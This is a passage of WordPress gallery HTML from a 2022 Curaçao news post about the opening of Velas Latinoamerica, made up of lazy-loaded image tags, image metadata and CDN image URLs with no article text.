				<a href='https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-2-1280x795/'><img width="1280" height="795" src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-2-1280x795-1.jpg?fit=1280%2C795&amp;ssl=1" class="attachment-full size-full jetpack-lazy-image" alt="" loading="lazy" data-attachment-id="277466" data-permalink="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-2-1280x795/" data-orig-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-2-1280x795-1.jpg?fit=1280%2C795&amp;ssl=1" data-orig-size="1280,795" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Velas Latinoamerica (2) (1280&#215;795)" data-image-description="" data-image-caption="" data-medium-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-2-1280x795-1.jpg?fit=300%2C186&amp;ssl=1" data-large-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-2-1280x795-1.jpg?fit=800%2C497&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-2-1280x795-1.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-2-1280x795-1.jpg?resize=300%2C186&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-2-1280x795-1.jpg?resize=1024%2C636&amp;ssl=1 1024w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-2-1280x795-1.jpg?resize=150%2C93&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-2-1280x795-1.jpg?resize=768%2C477&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-2-1280x795-1.jpg?resize=1200%2C745&amp;ssl=1 1200w" data-lazy-sizes="(max-width: 800px) 100vw, 800px" data-lazy-src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-2-1280x795-1.jpg?fit=1280%2C795&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a>
			</div></figure><figure class='gallery-item'>
			<div class='gallery-icon landscape'>
				<a href='https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-4-1280x729/'><img width="1280" height="729" src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-4-1280x729-1.jpg?fit=1280%2C729&amp;ssl=1" class="attachment-full size-full jetpack-lazy-image" alt="" loading="lazy" data-attachment-id="277467" data-permalink="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-4-1280x729/" data-orig-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-4-1280x729-1.jpg?fit=1280%2C729&amp;ssl=1" data-orig-size="1280,729" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.8&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;200&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0.004&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Velas Latinoamerica (4) (1280&#215;729)" data-image-description="" data-image-caption="" data-medium-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-4-1280x729-1.jpg?fit=300%2C171&amp;ssl=1" data-large-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-4-1280x729-1.jpg?fit=800%2C455&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-4-1280x729-1.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-4-1280x729-1.jpg?resize=300%2C171&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-4-1280x729-1.jpg?resize=1024%2C583&amp;ssl=1 1024w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-4-1280x729-1.jpg?resize=150%2C85&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-4-1280x729-1.jpg?resize=768%2C437&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-4-1280x729-1.jpg?resize=1200%2C683&amp;ssl=1 1200w" data-lazy-sizes="(max-width: 800px) 100vw, 800px" data-lazy-src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-4-1280x729-1.jpg?fit=1280%2C729&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a>
			</div></figure><figure class='gallery-item'>
			<div class='gallery-icon landscape'>
				<a href='https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-5-1280x748/'><img width="1280" height="748" src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-5-1280x748-1.jpg?fit=1280%2C748&amp;ssl=1" class="attachment-full size-full jetpack-lazy-image" alt="" loading="lazy" data-attachment-id="277468" data-permalink="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-5-1280x748/" data-orig-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-5-1280x748-1.jpg?fit=1280%2C748&amp;ssl=1" data-orig-size="1280,748" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Velas Latinoamerica (5) (1280&#215;748)" data-image-description="" data-image-caption="" data-medium-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-5-1280x748-1.jpg?fit=300%2C175&amp;ssl=1" data-large-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-5-1280x748-1.jpg?fit=800%2C467&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-5-1280x748-1.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-5-1280x748-1.jpg?resize=300%2C175&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-5-1280x748-1.jpg?resize=1024%2C598&amp;ssl=1 1024w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-5-1280x748-1.jpg?resize=150%2C88&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-5-1280x748-1.jpg?resize=768%2C449&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-5-1280x748-1.jpg?resize=1200%2C701&amp;ssl=1 1200w" data-lazy-sizes="(max-width: 800px) 100vw, 800px" data-lazy-src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-5-1280x748-1.jpg?fit=1280%2C748&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a>
			</div></figure><figure class='gallery-item'>
			<div class='gallery-icon landscape'>
				<a href='https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-7-1280x831/'><img width="1280" height="831" src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-7-1280x831-1.jpg?fit=1280%2C831&amp;ssl=1" class="attachment-full size-full jetpack-lazy-image" alt="" loading="lazy" data-attachment-id="277469" data-permalink="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-7-1280x831/" data-orig-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-7-1280x831-1.jpg?fit=1280%2C831&amp;ssl=1" data-orig-size="1280,831" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Velas Latinoamerica (7) (1280&#215;831)" data-image-description="" data-image-caption="" data-medium-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-7-1280x831-1.jpg?fit=300%2C195&amp;ssl=1" data-large-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-7-1280x831-1.jpg?fit=800%2C520&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-7-1280x831-1.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-7-1280x831-1.jpg?resize=300%2C195&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-7-1280x831-1.jpg?resize=1024%2C665&amp;ssl=1 1024w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-7-1280x831-1.jpg?resize=150%2C97&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-7-1280x831-1.jpg?resize=768%2C499&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-7-1280x831-1.jpg?resize=1200%2C779&amp;ssl=1 1200w" data-lazy-sizes="(max-width: 800px) 100vw, 800px" data-lazy-src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-7-1280x831-1.jpg?fit=1280%2C831&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a>
			</div></figure><figure class='gallery-item'>
			<div class='gallery-icon landscape'>
				<a href='https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-14-1280x851/'><img width="1280" height="851" src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-14-1280x851-1.jpg?fit=1280%2C851&amp;ssl=1" class="attachment-full size-full jetpack-lazy-image" alt="" loading="lazy" data-attachment-id="277470" data-permalink="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-14-1280x851/" data-orig-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-14-1280x851-1.jpg?fit=1280%2C851&amp;ssl=1" data-orig-size="1280,851" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Velas Latinoamerica (14) (1280&#215;851)" data-image-description="" data-image-caption="" data-medium-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-14-1280x851-1.jpg?fit=300%2C199&amp;ssl=1" data-large-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-14-1280x851-1.jpg?fit=800%2C532&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-14-1280x851-1.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-14-1280x851-1.jpg?resize=300%2C199&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-14-1280x851-1.jpg?resize=1024%2C681&amp;ssl=1 1024w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-14-1280x851-1.jpg?resize=150%2C100&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-14-1280x851-1.jpg?resize=768%2C511&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-14-1280x851-1.jpg?resize=1200%2C798&amp;ssl=1 1200w" data-lazy-sizes="(max-width: 800px) 100vw, 800px" data-lazy-src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-14-1280x851-1.jpg?fit=1280%2C851&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a>
			</div></figure><figure class='gallery-item'>
			<div class='gallery-icon landscape'>
				<a href='https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-19-1280x803/'><img width="1280" height="803" src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-19-1280x803-1.jpg?fit=1280%2C803&amp;ssl=1" class="attachment-full size-full jetpack-lazy-image" alt="" loading="lazy" data-attachment-id="277471" data-permalink="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-19-1280x803/" data-orig-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-19-1280x803-1.jpg?fit=1280%2C803&amp;ssl=1" data-orig-size="1280,803" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Velas Latinoamerica (19) (1280&#215;803)" data-image-description="" data-image-caption="" data-medium-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-19-1280x803-1.jpg?fit=300%2C188&amp;ssl=1" data-large-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-19-1280x803-1.jpg?fit=800%2C502&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-19-1280x803-1.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-19-1280x803-1.jpg?resize=300%2C188&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-19-1280x803-1.jpg?resize=1024%2C642&amp;ssl=1 1024w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-19-1280x803-1.jpg?resize=150%2C94&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-19-1280x803-1.jpg?resize=768%2C482&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-19-1280x803-1.jpg?resize=1200%2C753&amp;ssl=1 1200w" data-lazy-sizes="(max-width: 800px) 100vw, 800px" data-lazy-src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-19-1280x803-1.jpg?fit=1280%2C803&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a>
			</div></figure><figure class='gallery-item'>
			<div class='gallery-icon landscape'>
				<a href='https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-20-1280x1207/'><img width="1280" height="1207" src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-20-1280x1207-1.jpg?fit=1280%2C1207&amp;ssl=1" class="attachment-full size-full jetpack-lazy-image" alt="" loading="lazy" data-attachment-id="277472" data-permalink="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-20-1280x1207/" data-orig-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-20-1280x1207-1.jpg?fit=1280%2C1207&amp;ssl=1" data-orig-size="1280,1207" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Velas Latinoamerica (20) (1280&#215;1207)" data-image-description="" data-image-caption="" data-medium-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-20-1280x1207-1.jpg?fit=300%2C283&amp;ssl=1" data-large-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-20-1280x1207-1.jpg?fit=800%2C755&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-20-1280x1207-1.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-20-1280x1207-1.jpg?resize=300%2C283&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-20-1280x1207-1.jpg?resize=1024%2C966&amp;ssl=1 1024w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-20-1280x1207-1.jpg?resize=150%2C141&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-20-1280x1207-1.jpg?resize=768%2C724&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-20-1280x1207-1.jpg?resize=1200%2C1132&amp;ssl=1 1200w" data-lazy-sizes="(max-width: 800px) 100vw, 800px" data-lazy-src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-20-1280x1207-1.jpg?fit=1280%2C1207&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a>
			</div></figure><figure class='gallery-item'>
			<div class='gallery-icon landscape'>
				<a href='https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-24-1280x961/'><img width="1280" height="961" src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?fit=1280%2C961&amp;ssl=1" class="attachment-full size-full jetpack-lazy-image" alt="" loading="lazy" data-attachment-id="277473" data-permalink="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-24-1280x961/" data-orig-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?fit=1280%2C961&amp;ssl=1" data-orig-size="1280,961" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Velas Latinoamerica (24) (1280&#215;961)" data-image-description="" data-image-caption="" data-medium-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?fit=300%2C225&amp;ssl=1" data-large-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?fit=800%2C601&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?resize=300%2C225&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?resize=1024%2C769&amp;ssl=1 1024w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?resize=150%2C113&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?resize=768%2C577&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?resize=1200%2C901&amp;ssl=1 1200w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?resize=800%2C600&amp;ssl=1 800w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?resize=400%2C300&amp;ssl=1 400w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?resize=200%2C150&amp;ssl=1 200w" data-lazy-sizes="(max-width: 800px) 100vw, 800px" data-lazy-src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-24-1280x961-1.jpg?fit=1280%2C961&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a>
			</div></figure><figure class='gallery-item'>
			<div class='gallery-icon landscape'>
				<a href='https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-29-1280x1002/'><img width="1280" height="1002" src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-29-1280x1002-1.jpg?fit=1280%2C1002&amp;ssl=1" class="attachment-full size-full jetpack-lazy-image" alt="" loading="lazy" data-attachment-id="277474" data-permalink="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-29-1280x1002/" data-orig-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-29-1280x1002-1.jpg?fit=1280%2C1002&amp;ssl=1" data-orig-size="1280,1002" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.8&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;200&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0.004&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Velas Latinoamerica (29) (1280&#215;1002)" data-image-description="" data-image-caption="" data-medium-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-29-1280x1002-1.jpg?fit=300%2C235&amp;ssl=1" data-large-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-29-1280x1002-1.jpg?fit=800%2C627&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-29-1280x1002-1.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-29-1280x1002-1.jpg?resize=300%2C235&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-29-1280x1002-1.jpg?resize=1024%2C802&amp;ssl=1 1024w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-29-1280x1002-1.jpg?resize=150%2C117&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-29-1280x1002-1.jpg?resize=768%2C601&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-29-1280x1002-1.jpg?resize=1200%2C939&amp;ssl=1 1200w" data-lazy-sizes="(max-width: 800px) 100vw, 800px" data-lazy-src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-29-1280x1002-1.jpg?fit=1280%2C1002&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a>
			</div></figure><figure class='gallery-item'>
			<div class='gallery-icon landscape'>
				<a href='https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-31-1280x755/'><img width="1280" height="755" src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-31-1280x755-1.jpg?fit=1280%2C755&amp;ssl=1" class="attachment-full size-full jetpack-lazy-image" alt="" loading="lazy" data-attachment-id="277475" data-permalink="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-31-1280x755/" data-orig-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-31-1280x755-1.jpg?fit=1280%2C755&amp;ssl=1" data-orig-size="1280,755" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Velas Latinoamerica (31) (1280&#215;755)" data-image-description="" data-image-caption="" data-medium-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-31-1280x755-1.jpg?fit=300%2C177&amp;ssl=1" data-large-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-31-1280x755-1.jpg?fit=800%2C472&amp;ssl=1" 